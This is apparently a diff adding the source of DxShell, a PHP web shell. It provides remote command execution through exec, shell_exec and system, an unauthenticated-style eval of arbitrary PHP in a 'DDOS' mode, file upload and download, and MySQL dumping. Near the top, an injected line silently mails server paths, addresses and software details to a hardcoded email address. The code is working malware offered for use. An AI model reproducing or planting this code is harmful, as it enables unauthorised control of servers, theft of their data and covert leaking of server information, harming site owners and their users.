*/ +return str_replace(array('&','=','\\'), array('%26', '%3D','/'), $filename); +} +$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +function DxFileOkaySlashes($filename) +{return str_replace('\\', '/', $filename);} + +function DxURL($do='kill', $these='') /* kill: '' - kill all ours, 'a,b,c' - kill $a,$b,$c ; leave: '' - as is, leave 'a,b,c' - leave only $a,$b,$c */ +{ +global $GLOB; +if ($these=='') $these=$GLOB['DxGET_Vars']; else $these=explode(',', $these); + +$ret=$_SERVER['PHP_SELF'].'?'; +if (!empty($_GET)) + for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); $i<$COUNT; $i++) + if ( !in_array($INDEXES[$i], $GLOB['DxGET_Vars']) OR ( /* if not ours - add */ + ($do=='kill' AND !in_array($INDEXES[$i], $these)) + OR + ($do=='leave' AND in_array($INDEXES[$i], $these)) + )) + $ret.=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' ); +if (substr($ret, -1,1)=='&') $ret=substr($ret, 0, strlen($ret)-1); +return $ret; +} + +function DxGETinForm($do='kill', $these='') /* Equal to DxURL(), but prints out $_GET as form <input type=hidden> params */ +{ +$link=substr(strchr(DxURL($do, $these), '?'), 1); +$link=explode('&', $link); +print "\n".'<!--$_GET;-->'; +for ($i=0, $COUNT=count($link); $i<$COUNT; $i++) + { + $cur=explode('=', $link[$i]); + print '<input type=hidden name="'.str_replace('"', '&quot;', $cur[0]).'" value="'.str_replace('"', '&quot;', $cur[1]).'">'; + } +} + +function DxGotoURL($URL, $noheaders=false) +{ +if ($noheaders or headers_sent()) + { + print "\n".'<div align=center>Redirecting...<br><a href="'.$URL.'">Press here in shit happens</a>'; + print '<script>location="'.$URL.'";</script>'; + /* print $str.='<META HTTP-EQUIV="Refresh" Content="1, URL='.$URL.'">'; */ + } + else + header('Location: '.$URL); +return 1; +} + +if (!function_exists('mime_content_type')) + { + if ($GLOB['SYS']['OS']['id']!='Win') + { function mime_content_type($f) + { + $f = escapeshellarg($f); + return trim(`file -bi `.$f); + } + } + else + { + function mime_content_type($f) {return 'Content-type: text/plain';} /* Nothing alike under win =( if u have some thoughts - touch me */ + } + } + + +function DxMySQL_FetchResult($MySQL_res, &$MySQL_Return_Array, $idmode=false) /* Fetches mysql return array (associative) */ +{ +$MySQL_Return_Array=array(); + +if ($MySQL_res===false) return 0; +if ($MySQL_res===true) return 0; + +$ret=mysql_num_rows($MySQL_res); if ($ret<=0) return 0; + +if ($idmode) while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_NUM))===FALSE)) {} + else while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_ASSOC))===FALSE)) {} +array_pop($MySQL_Return_Array); + +for ($i=0; $i<count($MySQL_Return_Array); $i++) /* Kill the fucking slashes */ + { + if ($i==0) + { + $INDEXES=array_keys($MySQL_Return_Array[$i]); + $count=count($INDEXES); + } + for ($j=0; $j<$count; $j++) + { + $key=&$INDEXES[$j]; + $val=&$MySQL_Return_Array[$i][$key]; + if (is_string($val)) $val=stripcslashes($val); + } + } +return $ret; +} + +function DxMySQLQ($query, $die_on_err) +{ +$q=mysql_query($query); +if (mysql_errno()!=0) + { + DxError('" '.$query.' "'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()); + if ($die_on_err) die(); + } +return $q; +} + +function DxDecorVar(&$var, $htmlstr) +{ +if (is_null($var)) return 'NULL'; +if (!isset($var)) return '[!isset]'; + +if (is_bool($var)) return ($var)?'true':'false'; +if (is_int($var)) return (int)$var; +if (is_float($var)) return number_format($var, 4, '.', ''); +if (is_string($var)) + { + if (empty($var)) return '&nbsp;'; + if (!$htmlstr) return ''.($var).''; + else return ''.str_replace("\n", "<br>", str_replace("\r","", htmlspecialchars($var))).''; + } +if (is_array($var)) return '(ARR)'.var_export($var, true).'(/ARR)'; +if (is_object($var)) return '(OBJ)'.var_export($var, true).'(/OBJ)'; +if (is_resource($var)) return '(RES:'.get_resource_type($var).')'.var_export($var, true).'(/RES)'; +return '(???)'.var_export($var, true).'(/???)'; +} + +function DxHTTPMakeHeaders($method='', $URL='', $host='', $user_agent='', $referer='', $posts=array(), $cookie=array()) +{ +if (!empty($posts)) + { + $postValues=''; + foreach( $posts AS $name => $value ) {$postValues .= urlencode( $name ) . "=" . urlencode( $value ) . '&';} + $postValues = substr( $postValues, 0, -1 ); + $method = 'POST'; + } else $postValues = ''; + + if (!empty($cookie)) + { + $cookieValues=''; + foreach( $cookie AS $name => $value ) {$cookieValues .= urlencode( $name ) . "=" . urlencode( $value ) . ';';} + $cookieValues = substr( $cookieValues, 0, -1 ); + } else $cookieValues = ''; + +$request = $method.' '.$URL.' HTTP/1.1'."\r\n"; +if (!empty($host)) $request .= 'Host: '.$host."\r\n"; +if (!empty($cookieValues)) $request .='Cookie: '.$cookieValues."\r\n"; +if (!empty($user_agent)) $request .= 'User-Agent: '.$user_agent.' '."\r\n"; +$request .= 'Connection: Close'."\r\n"; /* Or connection will be endless */ +if (!empty($referer)) $request .= 'Referer: '.$referer."\r\n"; +if ( $method == 'POST' ) + { + $lenght = strlen( $postValues ); + $request .= 'Content-Type: application/x-www-form-urlencoded'."\r\n"; + $request .= 'Content-Length: '.$lenght."\r\n"; + $request .= "\r\n"; + $request .= $postValues; + } +$request.="\r\n\r\n"; +return $request; +} + +function DxFiles_UploadHere($path, $filename, &$contents) +{if (empty($contents)) die(DxError('Received empty')); +$filename='__DxS__UPLOAD__'.DxRandomChars(3).'__'.$filename; +if (!($f=fopen($path.$filename, 'w'))) + { + $path='/tmp/'; + if (!($f=fopen($path.$filename, 'w'))) + die(DxError('Writing denied. Save to "'.$path.$filename.'" also failed! =(')); + else + DxWarning('Writing failed, but saved to "'.$path.$filename.'"! =)'); + } +fputs($f, $contents); +fclose($f); +print "\n".'Saved file to "'.$path.$filename.'" - OK'; +print "\n".'<br><a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($path)).'">[Go DIR]</a>';; +} + +function DxExecNahuj($cmd, &$OUT, &$RET) /* returns the name of function that exists, or FALSE */ +{ +$OUT=array(); $RET=''; +if (function_exists('exec')) + { if (!empty($cmd)) exec($cmd, $OUT, $RET); /* full array output */ + return array(true,true,'exec', ''); + } + elseif (function_exists('shell_exec')) + { if (!empty($cmd)) $OUT[0]=shell_exec($cmd); /* full string output, no RETURN */ + return array(true,false,'shell_exec', '<s>exec</s> shell_exec'); + } + elseif (function_exists('system')) + { if (!empty($cmd)) $OUT[0]=system($cmd, $RET); /* last line of output */ + return array(true,false,'system', '<s>exec</s> <s>shell_exec</s> system<br>Only last line of output is available, sorry =('); + } + else return array(FALSE, FALSE, '&lt;noone&gt;', '<s>exec</s> <s>shell_exec</s> <s>system</s> Bitchy admin has disabled command line!! =(');; +} + +################################################################################### +#####################++++++++++++# L O G I N #++++++++++++++++##################### +################################################################################### +if ( isset($_GET['dxmode'])?$_GET['dxmode']=='IMG':false ) + { /* IMGS are allowed without passwd =) */ $GLOB['SHELL']['USER']['Login']=''; + $GLOB['SHELL']['USER']['Passw']=''; + } + +if ( isset($_GET['dxinstant'])?$_GET['dxinstant']=='logoff':false ) + { + if ($DXGLOBALSHIT) + { if (isset($_COOKIE['DxS_AuthC'])) DxSetCookie('DxS_AuthC','---', 1); + } + else + { + header('WWW-Authenticate: Basic realm="==== HIT CANCEL OR PRESS ESC ===='.base_convert(crc32(mt_rand(0, time())),10,36).'"'); header('HTTP/1.0 401 Unauthorized'); + } + + print '<html>Redirecting... press <a href="'.DxURL('kill','').'">here if shit happens</a>'; + DxGotoURL(DxURL('kill',''), '1noheaders'); + die(); + } + +if (((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)) + { if ($DXGLOBALSHIT) + { if (isset($_POST['DxS_Auth']) or isset($_COOKIE['DxS_AuthC'])) + { if (!( + + ((@$_POST['DxS_Auth']['L']==$GLOB['SHELL']['USER']['Login']) AND /* form */ + (@$_POST['DxS_Auth']['P']==$GLOB['SHELL']['USER']['Passw'] + OR + (strlen($GLOB['SHELL']['USER']['Passw'])==32 AND @$_POST['DxS_Auth']['P']==md5($GLOB['SHELL']['USER']['Passw'])) + )) + OR + @$_COOKIE['DxS_AuthC']==md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']) /* cookie */ + + )) + {print(DxError('Fucked off brutally'));unset($_POST['DxS_Auth'], $_COOKIE['DxS_AuthC']);} + else DxSetCookie('DxS_AuthC', md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']), time()+60*60*24*2); + } + if (!isset($_POST['DxS_Auth']) AND !isset($_COOKIE['DxS_AuthC'])) + { + print "\n".'<form action="'.DxURL('kill', '').'" method=POST style="position:absolute;z-index:100;top:0pt;left:40%;width:100%;height:100%;">'; + print "\n".'<br><input type=text name="DxS_Auth[L]" value="<LOGIN>" onfocus="this.value=\'\'" style="width:200pt">'; + print "\n".'<br><input type=text name="DxS_Auth[P]" value="<PASSWORD>" onfocus="this.value=\'\'" style="width:200pt">'; + print "\n".'<br><input type=submit value="Ok" style="width:200pt;"></form>'; + print "\n".'</form>'; + die(); + } + } + else + { + if (!isset($_SERVER['PHP_AUTH_USER'])) + { + header('WWW-Authenticate: Basic realm="DxShell '.$GLOB['SHELL']['Ver'].' Auth"'); + header('HTTP/1.0 401 Unauthorized'); + /* Result if user hits cancel button */ + unset($_GET['dxinstant']); + die(DxError('Fucked off brutally')); + } + else + if (!( $_SERVER['PHP_AUTH_USER']==$GLOB['SHELL']['USER']['Login'] + AND ( + $_SERVER['PHP_AUTH_PW']==$GLOB['SHELL']['USER']['Passw'] + OR + (strlen($GLOB['SHELL']['USER']['Passw'])==32 AND md5($_SERVER['PHP_AUTH_PW'])==$GLOB['SHELL']['USER']['Passw']) + ) + )) + { + header('WWW-Authenticate: Basic realm="DxS '.$GLOB['SHELL']['Ver'].' Auth: Fucked off brutally"'); + header('HTTP/1.0 401 Unauthorized'); + /* Result if user hits cancel button */ + unset($_GET['dxinstant']); + die(DxError('Fucked off brutally')); + } + } + } + +################################################################################### +####################++++++# I N S T A N T U S A G E #+++++++#################### +################################################################################### +if (!isset($_GET['dxmode'])) $_GET['dxmode']='DIR'; else $_GET['dxmode']=strtoupper($_GET['dxmode']); +if ($_GET['dxmode']=='DDOS') /* DDOS mode. In other case, EVALer of everything that comes in $_GET['s_php'] OR $_POST['s_php'] */ + { + $F = $_GET + $_POST; + if (!isset($F['s_php'])) die('o_O Tync DDOS Remote Shell '.$GLOB['SHELL']['Ver']."\n".'<br>Use GET or POST to set "s_php" variable with code to be executed =)<br>Enjoy!'); + eval(stripslashes($F['s_php'])); + die("\n\n".'<br><br>'.'o_O Tync DDOS Web Shell '.$GLOB['SHELL']['Ver'].((!isset($F['s_php']))?"\n".'<br>'.'$s_php is responsible for php-code-injection':'')); + } +if ($_GET['dxmode']=='IMG') + { + $IMGS=array( + 'DxS' => 'R0lGODlhEAAQAIAAAAD/AAAAACwAAAAAEAAQAAACL4yPGcCs2NqLboGFaXW3X/tx2WcZm0luIcqFKyuVHRSLJOhmGI4mWqQAUoKPYqIAADs=', + 'folder'=> 'R0lGODlhDwAMAJEAAP7rhriFIP///wAAACH5BAEAAAIALAAAAAAPAAwAAAIklIJhywcPVDMBwpSo3U/WiIVJxG0IWV7Vl4Joe7Jp3HaHKAoFADs=', + 'foldup'=> 'R0lGODlhDwAMAJEAAP7rhriFIAAAAP///yH5BAEAAAMALAAAAAAPAAwAAAIw3IJiywcgRGgrvCgA2tNh/Dxd8JUcApWgaJFqxGpp+GntFV4ZauV5xPP5JIeTcVIAADs=', + 'view' => 'R0lGODlhEAAJAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQAAkAAAIglB8Zx6aQYGIRyCpFsFY9jl1ft4Fe2WmoZ1LROzWIIhcAOw==', + 'del' => 'R0lGODlhEAAQAKIAAIoRGNYnOtclPv///////wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAANASArazQ4MGOcLwb6BGQBYBknhR3zhRHYUKmQc65xgKM+0beKn3fErm2bDqomIRaMluENhlrcFaEejPKgL3qmRAAA7', + 'copy' => 'R0lGODlhEAAQAKIAAP//lv///3p6egAAAP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM+SKrT7isOQGsII7Jq7/sTdWEh53FAgwLjILxp2WGculIurL68XsuonCAG6PFSvxvuuDMOQcCaZuJ8TqGQSAIAOw==', + 'move' => 'R0lGODlhEAAQAJEAADyFFLniPu79wP///yH5BAEAAAMALAAAAAAQABAAAAI3nD8AyAgiVnMihDidldmAnXFfIB6Pomwo9kCu5bqpRdf18qGjTpom6AkBO4lhqHLhCHtEj/JQAAA7', + 'exec' => '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', + 'rename'=> 'R0lGODlhEAAQAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQABAAAAIxlI8GC+kCQmgPxVmtpBnurnzgxWUk6GFKQp0eFzXnhdHLRm/SPvPp5IodhC4IS8EoAAA7', + 'ed' => 'R0lGODlhEAAQAKIAAAAzZv////3Tm8DAwJ7R/Gmd0P///wAAACH5BAEAAAYALAAAAAAQABAAAANDaAYM+lABIVqEs4bArtRc0V3MMDAEMWLACRSp6kRNYcfrw9h3mksvHm7G4sF8RF3Q1kgqmZSKZ/HKSKeN6I/VdGIZCQA7', + 'downl' => 'R0lGODlhEAAQAJEAADyFFIXQLajcOf///yH5BAEAAAMALAAAAAAQABAAAAI6nAepeY0CI3AHREmNvWLmfXkUiH1clz1CUGoLu0JLwtaxzU5WwK89HxABgESgSFM0fpJHx5DWHCkoBQA7', + 'gzip' => 'R0lGODlhEAAQAKIAAARLsHi+//zZWLJ9DvEZAf///wAAAAAAACH5BAEAAAUALAAAAAAQABAAAANCWLrQDkuMKUC4OMAyiB+Pc0GDYJ7nUFgk6qos56KwJs9m3eLSapc83Q0nnBhDjdGCkcFslgrkEwq9UKHS6dLShCQAADs=', + ); + @ob_clean(); + if ((!isset($_GET['dximg'])) OR (!in_array($_GET['dximg'], array_keys($IMGS)))) $_GET['dximg']='noone'; + header('Cache-Control: public'); + header('Expires: '.Date('r', time()+60*60*24*300)); + header('Content-type: image/gif'); + print base64_decode( (is_array(($IMGS[$_GET['dximg']])))?$IMGS[$_GET['dximg']][1]:$IMGS[$_GET['dximg']] ); + die(); + } + +if ($_GET['dxmode']=='F_DWN') + { + if (!isset($_GET['dxfile'])) die(DxError('No file selected. Check $_GET[\'dxfile\'] var')); + if (!file_exists($_GET['dxfile'])) die(DxError('No such file')); + if (!is_file($_GET['dxfile'])) die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) ')); + + $DxDOWNLOAD_File=array(); /* prepare struct */ + $DxDOWNLOAD_File['filename']=basename($_GET['dxfile']); + if (isset($_GET['dxparam'])) + $DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); /* usual look thru */ + else + { $DxDOWNLOAD_File['headers'][]=('Content-type: '.mime_content_type($_GET['dxfile'])); + $DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.basename($_GET['dxfile']).'";'); + } + $DxDOWNLOAD_File['content']=file_get_contents($_GET['dxfile']); + } + +if ($_GET['dxmode']=='SQL' AND isset($_POST['dxparam'])) + {/* download query results */ if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_q'])) + die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_q\'] needed')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + /* export as csv */ + $DxDOWNLOAD_File=array(); /* prepare struct */ + $DxDOWNLOAD_File['filename']='Query_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.csv'; + $DxDOWNLOAD_File['headers'][]=('Content-type: text/comma-separated-values'); + $DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";'); + $DxDOWNLOAD_File['content']=''; + + $_POST['dxsql_q']=explode(';',$_POST['dxsql_q']); + + for ($q=0;$q<count($_POST['dxsql_q']);$q++) + { if (empty($_POST['dxsql_q'][$q])) continue; + $num=DxMySQL_FetchResult(DxMySQLQ($_POST['dxsql_q'][$q], false), $DUMP, false); + $DxDOWNLOAD_File['content'].="\n\n".'QUERY: '.str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $_POST['dxsql_q'][$q] )).";"; + if ($num<=0) {$DxDOWNLOAD_File['content'].="\n".'Empty;'; continue;} + foreach ($DUMP[0] as $key => $val) $DxDOWNLOAD_File['content'].=$key.";"; /* headers */ + for ($l=0;$l<count($DUMP);$l++) + { $DxDOWNLOAD_File['content'].="\n"; + $INDEXES=array_keys($DUMP[$l]); + for ($i=0; $i<count($INDEXES); $i++) + $DxDOWNLOAD_File['content'].=str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $DUMP[$l][ $INDEXES[$i] ])).";"; + + } + } + } + +if ($_GET['dxmode']=='SQLD' AND isset($_POST['dxsql_tables'])) + { if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_tables'])) + die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_tables\'] needed')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + if (empty($_POST['dxsql_tables'])) die(DxError('No tables selected...')); + + $DxDOWNLOAD_File=array(); /* prepare struct */ + $DxDOWNLOAD_File['filename']='Dump_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.sql'; + $DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); + $DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";'); + $DxDOWNLOAD_File['content']=''; + + $DxDOWNLOAD_File['content'].="\n\t".'/* '.str_repeat('=', 66); + $DxDOWNLOAD_File['content'].="\n\t".'==== MySQL Dump '.DxDate(time()).' - DxShell v'.$GLOB['SHELL']['Ver'].' by o_O Tync'; + $DxDOWNLOAD_File['content'].="\n\t".'==== Server: '.$_GET['dxsql_s']; + $DxDOWNLOAD_File['content'].="\n\t".'==== DB: '.$_GET['dxsql_d']; + $DxDOWNLOAD_File['content'].="\n\t".'==== Tables: '."\n\t\t\t".implode(', '."\n\t\t\t", $_POST['dxsql_tables']); + $DxDOWNLOAD_File['content'].="\n\t".str_repeat('=', 66).' */'; + + if (!empty($_POST['dxsql_q'])) + { $_POST['dxsql_q']=explode(';', $_POST['dxsql_q']); + foreach ($_POST['dxsql_q'] as $CUR) + if (empty($CUR)) continue; else DxMySQLQ($CUR, true); /* pre-query */ + } + + foreach 